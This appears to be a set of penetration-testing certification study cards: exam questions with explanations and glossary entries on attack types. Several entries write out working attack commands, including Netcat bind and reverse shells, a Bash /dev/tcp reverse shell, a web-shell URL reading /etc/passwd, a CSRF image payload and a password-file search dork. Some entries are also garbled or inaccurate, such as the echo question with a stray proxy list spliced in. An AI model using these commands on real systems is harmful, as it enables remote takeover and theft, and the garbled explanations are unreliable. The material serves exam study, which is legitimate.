A pen tester is discussing an upcoming pen test with the client. The client is explaining which systems are off limits to the penetration test. Where should these details be recorded? A) SOW B) MSA C) Rules of engagement D) Bilateral NDA
C) Rules of engagement #The rules of engagement (RoE) document specifies the targets and systems that should be excluded from the pen test. With this in mind, this lines up more with what the client is explaining to the penetration tester.
A user in your company visits a website that asks if they want a monthly newsletter emailed to them. They think they click the link that says http://www.funideasmonthly.com, but they actually click a malicious hyperlink, http://www.funmalwaremonthly.com. What is this attack called? (Choose all that apply.) A) Juice jacking B) Cryptojacking C) Clickjacking D) Link jacking E) UI redressing
C) Clickjacking E) UI redressing #This is called clickjacking, also known as UI redressing. All clickjacking or UI redressing comes down to is a transparent layer over the link. When you think you are clicking one link, you are actually clicking the invisible link above it. It is pretty sneaky, and when the site does not have the security header properly built, this can be an issue outside of your browser or even your company's security to resolve. Always hover your mouse over a link and examine the actual hyperlink behind it.
During the execution of a pen test, several users report that they are arriving at the company intranet website to find a banner that says: Please report this site to your admin! It's a fake! Which attack type has the pen tester carried out? A) ARP spoofing B) Pass the hash C) DNS cache poisoning D) Man-in-the-middle
C) DNS cache poisoning #the users may be given false IP addresses for sites they normally visit. The attackers use this cache pollution to direct users to malicious websites where they may get malware or expose credentials. #The attacker uses nslookup to execute a transfer with the server and alters all or some of the records. The advantage to the hacker of doing it this way is that this pollution will affect EVERY user that utilizes the DNS server.
On a penetration test of your client's site, you see a shopping catalog. Upon looking at the pictures of the items in their catalog, you find the address of where the images are located in the web application: /var/coats/images/218.png. You put that address in your browser's URL as https://insecure-website.com/var/coats/images/218.png. The image of a coat shows up by itself. You take that image and play with the address to easily allow a certain type of attack to happen. There is no security against this attack in place. What is this attack called? A) File inclusion B) Cookie manipulation C) Directory traversal D) Malicious file upload
C) Directory traversal #This attack is a directory traversal. Directory traversal is a very common attack against sites. It is a real easy way to get around login information or access private galleries, files, or even username and email lists. Frequently this attack requires guessing which subdirectory and/or filename is your target. With some detective work, you can follow the normal file and domain structures that are out there. You can do this attack by using two different methods: the (.../) method or by typing in the absolute path (https://interconn.com/wp-content/uploads/2018/03).
Which of the following is NOT likely to be carried out after a penetration test is completed? A) Remove shells created during the test. B) Remove the tools installed during the test. C) Disable all services used during the test. D) Remove accounts created for the test.
C) Disable all services used during the test. #Disabling all services used during the test is NOT likely to be carried out after a penetration test is completed. You should only disable those services that were explicitly enabled for the penetration test. All other services will likely be valid services running in the enterprise. You should perform the following actions after completing a penetration test: Remove shells created during the test. Remove accounts created for the test. Remove the tools installed during the test.
A security analyst was provided with a detailed penetration report of a pen test performed against the organization's resources located in its secure operations center. It was noted on the report that a vulnerability on a server has a CVSS base score of 10.0. However, after performing further research, the security analyst notes that the AV measurement is P. What should the security analyst do to address the vulnerability? A) Ensure that communication over the entire internal network with the server is encrypted. B) Ensure that both internal and external communication with the server is encrypted. C) Ensure that the secure operations center has the appropriate physical controls to prevent access to the server. D) Ensure that communication on the local network with the server is encrypted.
C) Ensure that the secure operations center has the appropriate physical controls to prevent access to the server. #The security analyst should ensure that the secure operations center has the appropriate physical controls to prevent access to the server. An AV or Attack Vector measurement of P means that physical access to the host is required to execute the vulnerability. So for this vulnerability, you only need to prevent physical access to the host.
A penetration tester has been hired to perform a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five of them identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Which of the following would be the BEST suggestion for the client? A) Identify the issues that can be remediated most quickly and address them first. B) Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities C) Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. D) Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
C) Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. #The client should fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. Correcting the most critical vulnerability would prevent an attacker from remotely compromising a system easily and possibly obtaining full control.
A penetration tester reports that several servers have ports 20 and 21 open. These servers do not have any communication that should occur over those ports. You need to ensure that attacks cannot be carried out over these ports on those servers. What should you do? A) Harden the servers by disabling SMTP and its ports. B) Encrypt all communication over those ports. C) Harden the servers by disabling FTP and its ports. D) Implement a rule on the firewall to prevent communication over those ports.
C) Harden the servers by disabling FTP and its ports. #Hardening servers involves disabling unnecessary ports and services. You should only allow communication over valid ports. All other ports should be closed. NOTE: You should not implement a rule on the firewall to prevent communication over those ports. This will only prevent communications that passes through firewall which could interrupt the valid communications that uses ports 20 and 21 and not just the ones connected to the servers. You should not encrypt all the communications over those ports.
Your company carries out a penetration test on a regular basis. You are currently reviewing the report from the most recent penetration test. However, you recognize most of the findings as those that were reported in the last penetration test report. What does this indicate? A) Different tools were used to perform the most recent penetration test. B) The current penetration test was not properly completed. C) The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test. D) A different contractor was used to perform the most recent penetration test.
C) The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test. #If the mitigations had been deployed, the majority, if not all, of those vulnerabilities should be absent from the most recent report. Using a different contractor or different tools would not cause the same vulnerabilities to show up. Discovering many of the same vulnerabilities as the last penetration test is not an indication that the penetration test was not properly completed. An improperly completed test is likely to show few to no vulnerabilities. NOTE: After completing a penetration test and reviewing the results, it is important for a company to ensure that mitigations are deployed for the vulnerabilities reported in the findings section. Failure to do so is negligent and can result in legal issues. Companies should implement a time frame wherein all mitigations should be implemented.
While practicing your basic commands before a white box penetration test, you type the following: $ echo "There is a lot of space here" What will be the output? A) Thereisalotofspacehere B) There is a lot of space here C) There is a lot of space here D) None of these
C) There is a lot of space here #Using the quotes on the string in the echo command will result in that string being echoed exactly as specified. #If you do not use the quotes, as shown in the following example, the echo command automatically trims extra spaces between words: $ echo There is a lot of space here The output from that command would be: There is a lot of space here #For the output in this scenario, Proxychains was configured with a random chain of two proxies with proxy DNS requests enabled. The proxy list was follows: socks4 127.0.0.1 9050 socks4 103.14.38.146 1827 socks4 159.69.198.82 9050 socks4 115.91.83.42 4145
The value of the target has the largest effect on which characteristic of the pen test? A) rules of engagement B) schedule C) budget D) NDA
C) budget #When critical resources, or targets, are high-value or mission-critical, organizations tend to spend more time and money to test these against vulnerabilities. Therefore, the budget is most affected by the value of the target being pen tested. NOTE: The value of the target will not impact the schedule. What will impact the schedule is any need to assess resources under heavy loads, which is typically at certain times of the day. While the rules of engagement (ROE) can be used to exempt a high-value target from assessment, its value will not affect the rules of engagement if the target needs to be assessed.
When performing a compliance-based assessment, which of the following will present the largest challenges to obtaining complete results? A) limited time spent on assessment B) limited knowledge by assessor C) limited network access D) lack of assessment tools
C) limited network access #In many compliance-based assessments, restrictive rules of engagement, specifically those that limit the areas of testing, are the biggest impediment to good results. Another key problem can be limited access to certain storage areas. #Lack of assessment tools, lack of knowledge by assessor, limited time spent on assessment are not the biggest impediment to good results. That means, these factors are included within the scope of compliance-based assessment.
You teach a Linux course and have a large list of students enrolled in the course. After registration is complete, you need to sort the list of names alphabetically using commands on the Linux shell. You need a way to connect your output command with your sorting command. Which of the following will you use to accomplish this task? A) split B) redirection operator(>) C) pipe operator (|) D) cat
C) pipe operator (|) #The pipe operator (|) allows you to connect commands. The following command feeds the given text (three names) into the sort command: $ echo -e "Carla\Arthur\nBrian"|sort The output of that command would be as follows: Arthur Brian Carla The cat command (short for concatenate) allows you to display the contents of a file on the standard output (stdout). The following example would display the contents of the echofile file: $ cat echofile
After being engaged by a client, you executed a SOW to perform a pen test. During the test, you were asked by the client to test an additional system that was not included in the original SOW. The original SOW was not revised and signed, and a new SOW was not executed. If you tested the additional system, what has occurred? A) corruption of results B) test dilution C) scope creep D) task bleed
C) scope creep #Pen tests are planned and carried out as formal projects. In project management, scope creep occurs when the original project plan is not followed precisely. It typically indicates the addition of tasks or initiatives not included in the original plan scope.
A penetration tester wants to run an Nmap script that will use MSRPC to enumerate user accounts on a target. Which script would be best for this scenario? A) smb-enum-shares.nse B) smb-enum-services.nse C) smb-enum-users.nse D) http-enum.nse
C) smb-enum-users.nse #The smb-enum-users.nse script enumerates all user accounts on a remote system. It uses the Microsoft Remote Procedure Call (MSRPC) protocol to perform the reconnaissance. MSRPC is a Microsoft client-server protocol that allows one program to request services of another machine without prior knowledge of the specific details of that machine's internal network. From a pen test perspective, the information gained by using this protocol allows testers to build out an internal network and footprint specific users that exists on a remote system.
One of the key executives in the company received an email that appeared to come from the IT security officer requesting that he log into the network using a provided link and confirm his contact information. He did so, and shortly thereafter sensitive documents on his computer were stolen. What type of attack occurred? A) elicitation B) phishing C) whaling D) vishing
C) whaling NOTE: This is also not an elicitation attack. In short, elicitation is the act of gaining knowledge or information from a user or company without directly asking for it.
You are performing a pen test and would like to determine if the LLMNR service is disabled as policy specifies. Which Windows registry key on each device can be reviewed for the proper setting? A) HKLM\SYSTEM\Policies\Microsoft\Windows NT\Parameters B) HKLM\Security\Policies\Microsoft\Windows NT\DNSClient C)HKLM\Software\Policies\Microsoft\Windows NT\DNSClient D) HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\
C)HKLM\Software\Policies\Microsoft\Windows NT\DNSClient #The registry key to check if the LLMNR service is disabled is located at HKLM\Software\Policies\Microsoft\Windows NT\DNSClient, as shown in the exhibit below, using the registry editor. If the value is set to 0, Link-Local Multicast Name Resolution (LLMNR) is disabled. #The key is not located at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion. These settings control behavior during an update, such as the Uninstall setting. If you have had a problem uninstalling a program - for example, if the uninstall has gone wrong or you have simply deleted it - you may still see it listed in the Uninstall or change a program list in the Control Panel. This setting, when deleted, will stop that behavior.
CVSS (Common Vulnerability Scoring System)
CVSS is the Common Vulnerability Scoring System, which is an open framework for communicating the characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10. Level 9 in both the CVSS V2 and V3 rating is severe. Please fix these issues immediately.
Clickjacking
Clickjacking is putting a transparent clickable layer over a valid hyperlink. When you think you are clicking one hyperlink, you are actually clicking the invisible link above or behind it.
Cookie Manipulation
Cookie manipulation, also called cookie poisoning, is when a hacker is able to change data within that cookie to take over that user's information or bypass security measures on websites. Cookies are small pieces of data created and stored in a user's browser that keeps track of important information regarding the user's session information for a particular site.
Cryptojacking
Cryptojacking is a growing online threat that hides on a computer or mobile device and uses the device's resources to "mine" cryptocurrencies, such as Bitcoin, Litecoin, and Ethereum, and not yours but just mining in general. It is a growing menace that can take over the device, and you will only be made aware if cryptojacking activity is taking place if you pay attention to your network traffic and see system resources being drained in your task manager.
While performing a penetration test, you encounter several issues that you plan to document in the final report. However, you need to ensure that management is immediately notified of any critical issues documented in the communication escalation path. Which of the following is MOST likely to result in immediate communication to management? A) Encrypted personally identifiable information (PII) was discovered on several systems. B) A finding was discovered regarding an out-of-scope system. C) Unpatched applications exist on a system marked for retirement. D) A network compromise has previously occurred about which management knows nothing.
D) A network compromise has previously occurred about which management knows nothing. #Unpatched applications may exist on systems marked for retirement. However, this is usually not a critical issue because systems marked for retirement are often not updated regularly. This should be noted in the final report. #None of the other findings are critical, nor are they indicators of compromise. Critical findings and indicators of compromise are the only discoveries that should trigger communication, unless otherwise noted in the communication escalation directions. #Encrypted PII will often exist on multiple systems. However, encrypted PII is usually considered protected (unless a compromised encryption algorithm is being used). This issue would be included in the final report and only considered critical if 1) the PII should not be on the system on which it was discovered, or 2) the encryption algorithm being used to protect the PII has been compromised or is no longer considered secure.
An employee in your company received a text message from her bank stating that $1000 was just transferred out of her account. The bank wants to know if it was really her. On her desktop, you see what appears to be an authentic online session with her bank in one tab and a forum that looks kind of sketchy on another tab. You check out the forum site source code and notice this: <img src="http://bank.com/transfer.do?acct=BROOKE&amount=1000" width="0" height="0" border="0"> What do you think happened here? A) Clickjacking B) DoS C) SQL injection D) CSRF
D) CSRF #Cross-site request forgery or (XSRF or CSRF) is the act of abusing a web site's trust by posing as a legitimate user. The attack can post false, or harmful data on a forum, use/abuse open financial transactions, disable firewalls, and so on. The scary thing is a compromised user may not know these things until after the attack occurs.
A security analyst was provided with a detailed penetration report, which was performed against the organization's resources. It was noted on the report that a vulnerability on a file server has the following detailed CVSS 3.1 vector: CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N Which metric group in this vector should be of the highest concern to the security analyst? A) Integrity B) Availability C) Attack Vector D) Confidentiality
D) Confidentiality #The security analyst should be most concerned with the Confidentiality or C metric group because that metric group is rated as H or High. This means that there would be a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. #The Integrity metric group is rated at L or Low. This means modification of data is possible, but the attacker does not have control over the consequence of a modification, or the amount of modification is limited. This is not as high as the C rating. #The Availability metric group is rated at N or None, meaning that there is no impact to availability within the impacted component. #The Attack Vector metric group is rated P or Physical, meaning that the attack requires the attacker to physically touch or manipulate the vulnerable component.
A user operating from their home network calls the IT department claiming that she is presented with a defaced website with suspicious looking content when she accesses a company website. When this issue is investigated, the IT department sees no issues, and a log review shows that no files have been changed. Which of the following might explain the cause? A) MAC spoofing B) SQL injection C) ARP poisoning D) DNS poisoning
D) DNS poisoning #DNS cache poisoning is the act of entering false information into a DNS cache so that DNS queries return an incorrect response and users are directed to the wrong websites. This attack is also known as DNS spoofing. Because the IT department is not seeing the same things that the user is, it is likely that the user's DNS cache has been poisoned and her session is being redirected to a different website. NOTE: Though they're quite similar to each other, ARP spoofing is carried out over a LAN that involves sending ARP packets to the default gateway on a LAN in order to change the pairings in the gateway's IP address to MAC address table.
You must find metadata and hidden information within a document. Which tool should you use to complete this task? A) Theharvester B) Recon-ng C) Shodan D) FOCA
D) FOCA #The Fingerprinting Organizations with Collected Archives (FOCA) tool finds metadata and hidden information within documents. Because this specific function does not require any active actions, this is a method of passive reconnaissance. NOTE: The answer is not Theharvester. Theharvester enumerates DNS information about a given hostname/IP address. The answer is not Recon-ng. Recon-ng comes with Kali Linux and automates the information gathering of Open Source Intelligence (OSINT).
A penetration tester was able to convince an employee to give them valid login credentials, including username and password. You need to prevent this from happening in the future. Which remediation step should be recommended? A) Implement an IPS. B) Implement multi-factor authentication. C) Increase password complexity requirements. D) Mandate all employees take security awareness training.
D) Mandate all employees take security awareness training.
A network security analyst for the U.S Department of Defense (DoD) is looking to gain information about a foreign adversary. What method should be used FIRST to collect and analyze information on this target? A) Vulnerability scanning B) Port scanning C) Packet crafting D) OSINT
D) OSINT #Open source intelligence (OSINT) refers to information collection without the need for any covert methods. This is often a good first step in reconnaissance or threat hunting. Typically, the information could be found on the Internet, and this type of collection can often start with a simple Google search.
You are evaluating the results of a successful penetration test. The following URL was used to launch the attack: http://hackable.com/images/image.php?cmd=cat+/etc/passwd The browser displays output resembling the following: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync mail:x:8:8:mail:/var/mail:/usr/sbin/nologin geoclue:x:128:137::/var/lib/geoclue:/usr/sbin/nologin king-phisher:x:130:139::/var/lib/king-phisher:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin debian-tor:x:131:140::/var/lib/tor:/bin/false Which type of attack was performed? A) PHP bind shell B) PHP reverse shell C) PHP cross-site script D) PHP web shell
D) PHP web shell #In a web shell attack, the attacker uploads a script file to a web site and then executes that script using the web server's interpreter. If a web site has a file upload feature that does not perform file type checks, the attacker can use the front door to get the script file on the web server.
You are a SOC analyst at a financial company. While examining the logs, you notice a strange address: http://normalsite.com/index.php?Phone=http://malwaresiteohnoes.com/revshell.php/run What kind of attack is happening? A) XSS B) SQL injection C) DoS D) Redirect
D) Redirect #Redirects are not inherently a bad thing in and of themselves. For instance, they are a useful function to have when building a website. If a user attempts to access a resource before they are logged in, it is conventional to redirect them to the login page, put the original URL in a query parameter, and automatically redirect them towards their original destination after they have logged in. But there are always two sides to a coin! This is the exact reason that spammers and phishers use redirects and they are so enticing. They can bounce a user off of a site they want to go to and send them to an exact replica that is a malicious version of the site, where the user will log in and end up downloading malware, disclosing confidential information, and so on. This is a malicious redirecting attack.
A hacker was able to hack into the POS system of a retail store and refund a large amount into his bank account. What is the most likely service method the hacker used to gain unauthorized access to the POS system? A) OS version B) FTP service C) POS application D) SNMP service
D) SNMP service #The Simple Network Management Protocol (SNMP) service may be abused to gain unauthorized access to network devices. It provides a standardized framework for a common language that is used for monitoring and managing devices in a network. NOTE: A point-of-sale (POS) application would only check for the application version vulnerability. It is not a way to hack in and of itself, as it is just enumeration. The operating system (OS) version enumerates OS version details and verifies for any vulnerabilities. Again, this is just enumeration, not a way to hack in.
Which of the following is NOT an important factor in creating the communication escalation path? A) contact information for all stakeholders B) communication schedule C) secure communication protocols D) stakeholder team structure
D) stakeholder team structure #A proper communication escalation path identifies who the tester should contact, how often contact can be made, and under what conditions the stakeholders should be contacted. It also includes their contact information. Specifically, it should include: Contact information for all relevant stakeholders Frequency of communication with the stakeholders Method of communication with the stakeholders Individuals to contact in case of emergency The internal team structure for stakeholders is not typically used in the process of creating a communication escalation path.
Dynamic Link Library (DLL) hijacking
DLL hijacking is, like most hacks, abusing trust and asking for a certain DLL but without asking for the full file path name. All DLLs are looked for in a certain path. When you know that path order you can implant a malicious DLL and it will pull the first qualifying DLL up and load it, which will be your malicious DLL. NOTE: this would be a step after accessing direct file permissions and being able to write to the directory.
Full Path Disclosure (FPD)
Full path disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file (e.g. /home/omg/docs/file/). This is a great one to use and, if included with some file inclusion vulnerabilities, can give a hacker access to tasty config files to have fun.
man-in-the-middle attack
In MITM attack, a hacker pollutes the ARP cache of two communicating systems in such a way that they are communicating with the hacker when they think they are communicating with one another, placing the attacker in a position to receive all traffic between them. #occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver
XSS
In XSS attacks, hackers exploit input and scripting vulnerabilities to launch a malicious script on the client-side browser. XSS includes stored, reflected, and DOM-based attacks. It comes in many flavors such as the more common versions: Stored cross-site scripting (XSS) or persistent XSS, and it occurs when someone has implanted malicious code into the site that is always run when someone accesses that website. The attacker usually accesses the site via login, message board, or some other type of input.
KARMA attack
In a Karma Attacks Radioed Machines Automatically (KARMA) attack, the goal is to enumerate and generate SSIDs which the stations (which can include phones, laptops, and anything with a radio) have saved in their Preferred Network List (PNL). These are network profiles saved in the station, complete with credentials, that stations attempt to locate with probe requests at all times when they are not associated with an AP.
Successful bind shell connection
In a bind shell, an attacker connects directly to a target system's shell, usually bound to a listening port. First, the target machine creates the listening port as indicated in the following command line: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> nc.exe -lvp 4444 -e cmd.exe listening on [any] 4444 ... In this case, the target machine is a Windows 7 host running the Netcat tool. The combined -lvp switch will create a network service listening on port 4444. The backdoor switch -e will pass the Windows command shell to the attacker. Next, the attacker simply connects to the shell using the Netcat tool: root@kali:~# nc 172.18.60.251 4444 This command is issued on a Kali Linux host. If the execution is successful, the target host will indicate success as follows: connect to [172.18.60.251] from kali.home.net [172.18.60.249] 44348 On the attack host, the following output indicates success: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> The attacker now has access to the Windows console on the target host and can execute any local shell commands remotely.
Bind Shell
In a bind shell, an attacker connects directly to a target system's shell, usually bound to a listening port. You would perform the following steps for a Netcat bind shell, not a reverse shell: 1) Run C:\Users\Admin> nc.exe -lvp 4444 -e cmd.exe on 172.18.60.250 (target host). 2) Run root@kali:~# nc 172.18.60.248 4444 on 172.18.60.248 (attack host). 3) Run C:\Users\Admin> dir on 172.18.60.248 (attack host). The first step binds the command shell directly to the network service listener. The attacker then connects to the target host in the second step. The third step is the same. NOTE: You would not run root@kali:~# ls because the scenario requires you to list the Admin user's directory of the Windows 7 victim, not the content of the root user on the Kali Linux attack host.
SQL injection attack
In an SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (') are characteristics of these attacks. For example, the single quote in SQL is a limiter, meaning it ends any current SQL string. This is important for attackers to craft true conditions or true statements to bypass authentication or pull more information from a database than allowed.
Reverse Shell
In reverse shell, a network service listens on the attack host, the target then passes the shell to the attacker, and the attack host executes shell commands remotely on the target host. To list the contents of the Admin user's directory using a Netcat reverse shell, you would perform the following steps: 1) Run root@kali:~# nc -lvp 4444 on 172.18.60.248 (attack host). 2) Run C:\Users\Admin> nc.exe 172.18.60.248 4444 -e cmd.exe on 172.18.60.250 (target host). 3) Run C:\Users\Admin> dir on 172.18.60.248 (attack host). The first step sets up the network service on the attack host using Netcat over port 4444. The output would resemble the following: listening on [any] 4444 ... The second step then connects the target host to the attack host using Netcat. The output on the attacker machine will now resemble the following: connect to [172.18.60.248] from Win7Victim.home.net [172.18.60.250] 49435 Microsoft Windows [Version 6.1.7600] Now that the connection has been established with the Windows console prompt, the third step lists the directory of the Admin user on the attack host using the dir command.
Pass the Hash Attack
In that attack the hacker attempts to locate the hash of a password that exists on multiple machines (such as a domain admin account) and use that hash to sign in to these machines with those rights. This typically exploits the Server Message Block (SMB) service and can be done from the Metasploit framework using the psexec utility.
Replay Attack (session replays)
In this attack, packets of interest (typically containing authentication credentials) are captured and re-sent at another time, allowing successful authentication to a service or device.
Out-of-scope systems issues
Issues with out-of-scope systems should be noted in the final report. However, out-of-scope systems should not be thoroughly tested. Often you may accidentally discover an issue with an out-of-scope system, but issues with out-of-scope systems should only be reported and not investigated further unless priorities change. KEEP IT OUT OF UR SIGHT!!
Requirement of prioritization after receiving penetration test report
It may be necessary to reprioritize the goals of the penetration test if discoveries are made during the test that warrants the reprioritization. Reprioritization cannot occur after the penetration testing report is provided. However, lessons learned from a penetration test can help shape the goals of the next penetration test.
Shodan
Shodan is a search engine which identifies vulnerable systems on the internet. Shodan scans the internet, looking for these vulnerable/exposed systems, and puts the results on its website. Because penetration testers can gather information of these systems without actively scanning themselves, this is a method of passive reconnaissance.
Skadi AIDA DEFT
Skadi is an all-in-one solution for parsing collected data. This makes the data easily searchable and allows for the searching through multiple hosts simultaneously. Digital Investigation and Analysis (AIDA) is an appliance with many tools aimed for digital investigation/acquisition. It is VMware-based. Digital Evidence and Forensics Toolkit (DEFT). This tool is a Linux distribution mainly aimed for the collection of computer forensic evidence.
Smurf Attack
Smurf attack occurs when a combination of Internet Protocol (IP) spoofing and Internet Control Message Protocol (ICMP) messages saturates a network
The Master services agreement (MSA)
The Master services agreement (MSA) is used to set parameters for ongoing tests, each with their own SOW. Having a MSA on file means that penetration testers do not need to renegotiate terms for every test with established clients. The schedule of payment would be established separately in the SOW for a specific project, regardless of the presence of an MSA.
Successful reverse shell
The following demonstrates a reverse shell using NetCat. First, set up the network service on the attack host: root@kali:~# nc -lvp 4444 listening on [any] 4444 ... Then the target host makes the connection: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> nc.exe 172.18.60.249 4444 -e cmd.exe Finally, the connection is established between attacker and target, allowing the attacker to remotely execute commands on the target host: connect to [172.18.60.249] from win7.home.net [172.18.60.251] 49435 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\Jack Pawned> The following is an example of a Bash reverse shell. On the attack host, run NetCat to set up the network service listener: root@kali:~# nc -lvp 4444 listening on [any] 4444 ... This time, instead of using NetCat to pass the Bash shell, you can instead pass it directly using Bash on the target host: [root@blackarch ~]# bash -i>& /dev/tcp/172.18.60.249/4444 0>&1 This command redirects Bash input and output to the attacker host. Once this executes, the attacker host will receive this output: connect to [172.18.60.249] from blackarch.home.net [172.18.60.252] 44612 [root@blackarch ~]# The result is the same: the attacker can now issue commands on the target host remotely.
NDA (Non-Disclosure Agreement)
The non-disclosure agreement (NDA), which is signed by the tester, requires the tester to keep all company information private. It does not address payment.
WPS implementation weakness attack
WPS implementation weakness attack is an attack on the Wi-Fi Protected Setup (WPS) service, which was designed to make attaching new devices to a home wireless network easier by transmitting the WPA or WPA2 PIN to the new device. By using a utility called Reaver, the PIN can be cracked.
A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and see them enter the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE) a) Returns only files hosted as diontraining.com b) Excludes Microsoft Excel spreadsheets c) Personalization is turned off d) All search filters are deactivated e) Returns only Microsoft Excel spreadsheets f) Find sites related to diontraining.com
a) Returns only files hosted as diontraining.com c) Personalization is turned off e) Returns only Microsoft Excel spreadsheets #The above example searches for files with the name "password" in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ':') and (+) limits the results to files hosted on diontraining.com (site%3Adiontraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the "related:" term to the query. To deactivate all filters from the search, the "filter=0" should be used. To deactivate the directory filtering function, the "filter=p" is used.
Which of the following commands should be run on an attacker's system to connect to a target with a bind shell running? a) nc 192.168.1.53 31337 b) nc 192.168.1.53 31337 -e /bin/sh c) nc -lp 31337 -e /bin/sh d) nc -lp 31337
a) nc 192.168.1.53 31337 #A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you should execute the command "nc -lp 31337 -e /bin/sh" on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command "nc 192.168.1.53 31337" to connect to the victim's bind shell. #A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command "nc -lp 31337" on it. To connect to the attacking machine from the victim machine, you would enter the command "nc 192.168.1.53 31337 -e /bin/sh" on it.